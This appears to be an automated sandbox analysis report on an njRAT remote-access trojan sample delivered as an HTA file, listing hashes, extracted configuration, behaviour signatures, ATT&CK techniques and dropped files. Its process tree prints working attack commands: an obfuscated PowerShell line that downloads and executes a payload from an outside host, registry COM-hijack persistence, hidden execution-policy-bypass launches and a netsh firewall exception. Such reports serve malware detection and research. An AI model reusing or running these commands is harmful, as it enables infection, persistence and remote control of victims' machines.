njrat | 41a306a197179294435fa744d946f94cea575a2bb2a415a2efa5f564c9017149

General

Target

enc3.hta
Size

4KB
MD5

586ddb57373ee157da834b1c83da00af
SHA1

d240d7266f86bc74817fc45556d0d4cae4424efc
SHA256

06769b16f5a4d86ab1c87f7811b6ed4964814cb469e01321c888dab9a2bf5696
SHA512

467b362ba0feed6b6a15ce2ff767bf2e2503640f05369beba98b6dd67709a632f23b0186f7c21ecd330fd4911c19a68a6fe8e51649a7a983426fd1f2222a6b0e

Score

10^/10

njrat hacked evasion persistence trojan

Malware Config

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes

reg_key
Microsoft.Exe

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POWERSHELL.exePOWERSHELL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4576	3968	POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1140	3968	POWERSHELL.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 1 IoCs

Processes:

POWERSHELL.exe

flow pid process

6 4576 POWERSHELL.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

2976 netsh.exe

flow	pid	process
6	4576	POWERSHELL.exe

pid	process
2976	netsh.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2412 set thread context of 1400 2412 powershell.exe aspnet_compiler.exe

description	pid	process	target process
PID 2412 set thread context of 1400	2412	powershell.exe	aspnet_compiler.exe

Modifies registry class 4 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

5052 reg.exe
4528 reg.exe

pid	process
5052	reg.exe
4528	reg.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exe

pid	process
4576	POWERSHELL.exe
4576	POWERSHELL.exe
4036	powershell.exe
4036	powershell.exe
1140	POWERSHELL.exe
1140	POWERSHELL.exe
2412	powershell.exe
2412	powershell.exe
2412	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4576	POWERSHELL.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	1140	POWERSHELL.exe
Token: SeIncreaseQuotaPrivilege	4036	powershell.exe
Token: SeSecurityPrivilege	4036	powershell.exe
Token: SeTakeOwnershipPrivilege	4036	powershell.exe
Token: SeLoadDriverPrivilege	4036	powershell.exe
Token: SeSystemProfilePrivilege	4036	powershell.exe
Token: SeSystemtimePrivilege	4036	powershell.exe
Token: SeProfSingleProcessPrivilege	4036	powershell.exe
Token: SeIncBasePriorityPrivilege	4036	powershell.exe
Token: SeCreatePagefilePrivilege	4036	powershell.exe
Token: SeBackupPrivilege	4036	powershell.exe
Token: SeRestorePrivilege	4036	powershell.exe
Token: SeShutdownPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeSystemEnvironmentPrivilege	4036	powershell.exe
Token: SeRemoteShutdownPrivilege	4036	powershell.exe
Token: SeUndockPrivilege	4036	powershell.exe
Token: SeManageVolumePrivilege	4036	powershell.exe
Token: 33	4036	powershell.exe
Token: 34	4036	powershell.exe
Token: 35	4036	powershell.exe
Token: 36	4036	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeIncreaseQuotaPrivilege	4036	powershell.exe
Token: SeSecurityPrivilege	4036	powershell.exe
Token: SeTakeOwnershipPrivilege	4036	powershell.exe
Token: SeLoadDriverPrivilege	4036	powershell.exe
Token: SeSystemProfilePrivilege	4036	powershell.exe
Token: SeSystemtimePrivilege	4036	powershell.exe
Token: SeProfSingleProcessPrivilege	4036	powershell.exe
Token: SeIncBasePriorityPrivilege	4036	powershell.exe
Token: SeCreatePagefilePrivilege	4036	powershell.exe
Token: SeBackupPrivilege	4036	powershell.exe
Token: SeRestorePrivilege	4036	powershell.exe
Token: SeShutdownPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeSystemEnvironmentPrivilege	4036	powershell.exe
Token: SeRemoteShutdownPrivilege	4036	powershell.exe
Token: SeUndockPrivilege	4036	powershell.exe
Token: SeManageVolumePrivilege	4036	powershell.exe
Token: 33	4036	powershell.exe
Token: 34	4036	powershell.exe
Token: 35	4036	powershell.exe
Token: 36	4036	powershell.exe
Token: SeIncreaseQuotaPrivilege	4036	powershell.exe
Token: SeSecurityPrivilege	4036	powershell.exe
Token: SeTakeOwnershipPrivilege	4036	powershell.exe
Token: SeLoadDriverPrivilege	4036	powershell.exe
Token: SeSystemProfilePrivilege	4036	powershell.exe
Token: SeSystemtimePrivilege	4036	powershell.exe
Token: SeProfSingleProcessPrivilege	4036	powershell.exe
Token: SeIncBasePriorityPrivilege	4036	powershell.exe
Token: SeCreatePagefilePrivilege	4036	powershell.exe
Token: SeBackupPrivilege	4036	powershell.exe
Token: SeRestorePrivilege	4036	powershell.exe
Token: SeShutdownPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeSystemEnvironmentPrivilege	4036	powershell.exe
Token: SeRemoteShutdownPrivilege	4036	powershell.exe
Token: SeUndockPrivilege	4036	powershell.exe
Token: SeManageVolumePrivilege	4036	powershell.exe
Token: 33	4036	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exe

description	pid	process	target process
PID 4576 wrote to memory of 4036	4576	POWERSHELL.exe	powershell.exe
PID 4576 wrote to memory of 4036	4576	POWERSHELL.exe	powershell.exe
PID 4036 wrote to memory of 3800	4036	powershell.exe	WScript.exe
PID 4036 wrote to memory of 3800	4036	powershell.exe	WScript.exe
PID 1140 wrote to memory of 5068	1140	POWERSHELL.exe	cmd.exe
PID 1140 wrote to memory of 5068	1140	POWERSHELL.exe	cmd.exe
PID 5068 wrote to memory of 5052	5068	cmd.exe	reg.exe
PID 5068 wrote to memory of 5052	5068	cmd.exe	reg.exe
PID 5068 wrote to memory of 4528	5068	cmd.exe	reg.exe
PID 5068 wrote to memory of 4528	5068	cmd.exe	reg.exe
PID 5068 wrote to memory of 860	5068	cmd.exe	cmd.exe
PID 5068 wrote to memory of 860	5068	cmd.exe	cmd.exe
PID 860 wrote to memory of 2412	860	cmd.exe	powershell.exe
PID 860 wrote to memory of 2412	860	cmd.exe	powershell.exe
PID 2412 wrote to memory of 1400	2412	powershell.exe	aspnet_compiler.exe
PID 2412 wrote to memory of 1400	2412	powershell.exe	aspnet_compiler.exe
PID 2412 wrote to memory of 1400	2412	powershell.exe	aspnet_compiler.exe
PID 2412 wrote to memory of 1400	2412	powershell.exe	aspnet_compiler.exe
PID 2412 wrote to memory of 1400	2412	powershell.exe	aspnet_compiler.exe
PID 2412 wrote to memory of 1400	2412	powershell.exe	aspnet_compiler.exe
PID 2412 wrote to memory of 1400	2412	powershell.exe	aspnet_compiler.exe
PID 2412 wrote to memory of 1400	2412	powershell.exe	aspnet_compiler.exe
PID 1400 wrote to memory of 2976	1400	aspnet_compiler.exe	netsh.exe
PID 1400 wrote to memory of 2976	1400	aspnet_compiler.exe	netsh.exe
PID 1400 wrote to memory of 2976	1400	aspnet_compiler.exe	netsh.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
PID:1784

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL $HAAEOALBRXAIOCSRBGSCEDW = '[\<5<_!]70#&-5)7@5(59]4y\<5<_!]70#&-5)7@5(59]4t(_*)})-[*\[/(%/0^!%{(@<{3%\$}7!6&14]}&1*=57[.IO.\<5<_!]70#&-5)7@5(59]4t_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}<{3%\$}7!6&14]}&1*=57[_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}d(_*)})-[*\[/(%/0^!%{(@_13[9$#[<1/}#^#2^8$$[)]'.Replace('\<5<_!]70#&-5)7@5(59]4','S').Replace('(_*)})-[*\[/(%/0^!%{(@','E').Replace('_13[9$#[<1/}#^#2^8$$[)','R').Replace(']61=$}4}}4^7<*&/@!%+\}','A').Replace('<{3%\$}7!6&14]}&1*=57[','M');$HLTYLQWQUSUZZXXCFYGBYAD = ($HAAEOALBRXAIOCSRBGSCEDW -Join '')|&('I'+'EX');$HZJDPHHLCFDWDOVEILVRHQQ = '[07^[^&[4<5=268_/]+1(-!y07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<_/$_4}0]/-)5%[/3\9@[email protected]_/$_4}0]/-)5%[/3\9@76@02=(]2+25)4/&*#[$2}36<.W_/$_4}0]/-)5%[/3\9@76@bR_/$_4}0]/-)5%[/3\9@76@qu_/$_4}0]/-)5%[/3\9@76@07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<]'.Replace('07^[^&[4<5=268_/]+1(-!','S').Replace('_/$_4}0]/-)5%[/3\9@76@','E').Replace('02=(]2+25)4/&*#[$2}36<','T');$HGWVOWBJIRKOZPAZDHKCXFR = ($HZJDPHHLCFDWDOVEILVRHQQ -Join '')|&('I'+'EX');$HATKNHVTWEYFZVGJTJKPOJF = '<&]4^<529_}0((#90_50&$r0*)$60%](_0*8%7$%{4&\_a[#}02[3_+}(*7!^3}[*#350*)$60%](_0*8%7$%{4&\_'.Replace('<&]4^<529_}0((#90_50&$','C').Replace('0*)$60%](_0*8%7$%{4&\_','E').Replace('[#}02[3_+}(*7!^3}[*#35','T');$HIGJPHAPDSYPKOSVELGREOR = '<2!\3]6!6<&_+7)[9)}\/^<+8]/@<9<^(+${/4-7%@)(tR<+8]/@<9<^(+${/4-7%@)(1*)9%/*/(56%3__7\}!\11pon1*)9%/*/(56%3__7\}!\11<+8]/@<9<^(+${/4-7%@)('.Replace('<2!\3]6!6<&_+7)[9)}\/^','G').Replace('<+8]/@<9<^(+${/4-7%@)(','E').Replace('1*)9%/*/(56%3__7\}!\11','S');$HRFXTROBLKIFECVKROLDLJL = 'G&/+0%*9_1+*1&)^)2$3<+(t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%pon21{}\5[($(]@_+8_\1+1\%&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(am'.Replace('21{}\5[($(]@_+8_\1+1\%','S').Replace('&/+0%*9_1+*1&)^)2$3<+(','E').Replace('(+<</9]!8<4(%}5)_9!{*7','R');$HPLYZILQXYLUTLCHOFQSIZE = '}_5)50/8//-/@10^)<{_$(\/5+^${{)\1@]!}04*@126a}&%406_!1]{7-7^%}&%50[To\/5+^${{)\1@]!}04*@126n}&%406_!1]{7-7^%}&%50['.Replace('}_5)50/8//-/@10^)<{_$(','R').Replace('\/5+^${{)\1@]!}04*@126','E').Replace('}&%406_!1]{7-7^%}&%50[','D');&('I'+'EX')($HLTYLQWQUSUZZXXCFYGBYAD::new($HGWVOWBJIRKOZPAZDHKCXFR::$HATKNHVTWEYFZVGJTJKPOJF('https://tradeguru.com.pk/Server3.txt').$HIGJPHAPDSYPKOSVELGREOR().$HRFXTROBLKIFECVKROLDLJL()).$HPLYZILQXYLUTLCHOFQSIZE())
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1'"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4036

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs"
3⤵
PID:3800

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:5068

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
3⤵
- Modifies registry class
- Modifies registry key
PID:5052

C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"
3⤵
- Suspicious use of WriteProcessMemory
PID:860

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2412

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
3⤵
- Modifies Windows Firewall
PID:2976

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1
Filesize
604KB

MD5
ab1fce3ab2f6f211da8f8dc30c2b3060

SHA1
ae0dff660b20f9209a66029d44b048a63cc80336

SHA256
7cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca

SHA512
ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85

Download Submit
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat
Filesize
706B

MD5
1a2189e850187ca0cfadf5eba71bf87b

SHA1
022de59e2f7a4ada62a34c701d35a8f6b738a140

SHA256
d19e4c732fd1125438cb1d7e2278d9420fad7d3e66fcc6c56879258364664997

SHA512
9acf6053091a18388b9da45ea7147b71bbeb3acda7697d311ce9a416578595427ec3661a41c09abed75ae155d11c15b3573883effa25eeb86cfbf93eb515d49d

Download Submit
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1
Filesize
3KB

MD5
1fe311d146874fa10f4eedf9941dabd4

SHA1
4ea8f6f1fcc57a1cba5b388e11df6c3a58fc9709

SHA256
804d3783e70a5a575eeb0e7d617186bd1f8dcbd3244a736521194948fa80ea1d

SHA512
7a70c224d707ff7a723daa86ded140987fbf52d38a2c1cdacc1d04c53c447b78fa5cb49843eeebf126fa95cb72b44f436581b383ebde645ab53105d5f8fc74bb

Download Submit
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs
Filesize
1KB

MD5
8b0c7083e7b7bb3a886e13dcd0830ba9

SHA1
444748aad7b9289f1b371aaac955c0554ca62d17

SHA256
45bbe8aafd1246fa15881a63f3cb8997a35cfc3e78ba306fc5abbaf72cf2867e

SHA512
d23a9aa4d91231b26eca8c61a6487e9f151be19a45ce7a8bfb818ebd16803cfad219ae594cfb57263e7044e9f73d3705239267345f0e03a7e478f196938d3c89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
Filesize
3KB

MD5
00e7da020005370a518c26d5deb40691

SHA1
389b34fdb01997f1de74a5a2be0ff656280c0432

SHA256
a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

SHA512
9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0ab03b4ab0ee8273a1eea28cef1ca1e7

SHA1
8a305ca40e71bd2b04b20c65e28730e3ff3f50b2

SHA256
695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed

SHA512
7347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
bc34f67b09ef76be9c393b6fb6508a35

SHA1
7c59c76b6afb72f268e07e1c8ec7dd7f3860ebdb

SHA256
8d8540e29fff09fbed6d44d34adbe5c89c005a6c7b44426dce62dcdd1bd414c6

SHA512
4a0ffb8c01a44edd58d92473a2b1fe169dd669d4821b7bc0617f03f1b646788a7db76f4c08b447f87a54c787d49b90560e0f97bccf88019e68300d5ddeeb387f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
memory/860-142-0x0000000000000000-mapping.dmp

Download
memory/1140-157-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp

Filesize
10.8MB

Download
memory/1140-144-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp

Filesize
10.8MB

Download
memory/1400-156-0x00000000053A0000-0x000000000543C000-memory.dmp

Filesize
624KB

Download
memory/1400-158-0x00000000059F0000-0x0000000005F94000-memory.dmp

Filesize
5.6MB

Download
memory/1400-159-0x00000000054E0000-0x0000000005572000-memory.dmp

Filesize
584KB

Download
memory/1400-152-0x000000000040BBBE-mapping.dmp

Download
memory/1400-161-0x00000000059D0000-0x00000000059DA000-memory.dmp

Filesize
40KB

Download
memory/1400-151-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1400-162-0x0000000006240000-0x00000000062A6000-memory.dmp

Filesize
408KB

Download
memory/2412-154-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp

Filesize
10.8MB

Download
memory/2412-146-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp

Filesize
10.8MB

Download
memory/2412-143-0x0000000000000000-mapping.dmp

Download
memory/2976-160-0x0000000000000000-mapping.dmp

Download
memory/3800-136-0x0000000000000000-mapping.dmp

Download
memory/4036-147-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp

Filesize
10.8MB

Download
memory/4036-133-0x0000000000000000-mapping.dmp

Download
memory/4036-135-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp

Filesize
10.8MB

Download
memory/4528-141-0x0000000000000000-mapping.dmp

Download
memory/4576-130-0x000001EC78BD0000-0x000001EC78BF2000-memory.dmp

Filesize
136KB

Download
memory/4576-150-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp

Filesize
10.8MB

Download
memory/4576-132-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp

Filesize
10.8MB

Download
memory/4576-131-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp

Filesize
10.8MB

Download
memory/5052-140-0x0000000000000000-mapping.dmp

Download
memory/5068-138-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads